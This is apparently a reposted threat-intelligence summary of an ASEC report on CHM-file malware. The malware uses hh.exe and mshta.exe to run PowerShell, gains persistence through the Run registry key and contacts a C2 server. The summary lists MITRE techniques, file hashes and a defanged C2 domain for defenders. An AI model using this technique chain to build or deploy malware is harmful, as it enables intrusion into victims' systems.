Threat Research

Tracking the CHM Malware Using EDR – ASEC BLOG

Securonix

ASEC reports a CHM-based APT technique where threat actors use Compiled HTML Help Files to execute malware via hh.exe, download a PowerShell script, and run it through mshta.exe. The operation culminates in persistence via the Run registry key and C2 communication over HTTP, with EDR visibility and MITRE mappings highlighted. #CHM #shacc.kr

Keypoints

  • CHM-based APT tactic uses Compiled HTML Help Files executed via hh.exe to drop malware.
  • The CHM loader downloads a malicious script from the threat actor’s server and executes PowerShell via mshta.exe.
  • The PowerShell script registers commands in the Run key to maintain persistence and interacts with the threat actor’s C2 server.
  • The attack can be observed in email attachments with a visible EDR process tree showing hh.exe and mshta.exe activity.
  • MITRE ATT&CK mapping includes T1218.001 and T1547, illustrating system binary proxy execution and autorun persistence.
  • EDR provides response options such as terminating processes, collecting files, and isolating infected hosts to block further damage.

MITRE Techniques

  • [T1218.001] System Binary Proxy Execution: Compiled HTML File – CHM/HTML is executed via hh.exe to launch malware. ‘MITRE ATT&CK refers to this technique where a threat actor uses a signed program or a program installed by default on an OS to execute malware as T1218 (System Binary Proxy Execution).’
  • [T1218.004] Mshta – The CHM threat uses mshta.exe to run PowerShell, enabling stealthy execution. ‘The CHM malware discovered by ASEC this time downloads a malicious script … It then runs the script, executing PowerShell through mshta.exe.’
  • [T1059.001] PowerShell – The malicious script ultimately executes PowerShell to perform commands and set up persistence via the Run key. ‘The PowerShell script ultimately executed in Figure 2 registers a command to the registry Run key to perform the commands received from the threat actor’s C&C server and maintain persistence.’
  • [T1547.001] Boot or Logon Autostart Execution: Run Keys/Startup Folder – Persistence by registering the Run key to auto-start. ‘autorun registry Run key registration’ (Figure 6).
  • [T1071.001] Web Protocols – C2 communications over HTTP to the actor’s server. ‘C&C: hxxp://shacc[.]kr/skin/product/1.html’
  • [T1105] Ingress Tool Transfer – The malicious script is downloaded from the threat actor’s server. ‘downloads a malicious script (Figure 2) from the threat actor’s server.’

Indicators of Compromise

  • [Process] hh.exe – observed initiating mshta.exe during CHM execution (process chain)
  • [Process] mshta.exe – invoked to run PowerShell as part of the chain
  • [File hash] 809528921de39530de59e3793d74af98 – CHM.Agent (Trojan) alias detected by EDR
  • [File hash] 32445d05dd1348bce9b6a395b2f8fbd8 – Backdoor/Powershell.Generic.SC187227 alias detected by EDR
  • [URL] hxxp://shacc[.]kr/skin/product/1.html – C2 address referenced by the threat
  • [Domain] shacc.kr – C2 domain used in the command and control flow

Read more: https://asec.ahnlab.com/en/50580/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint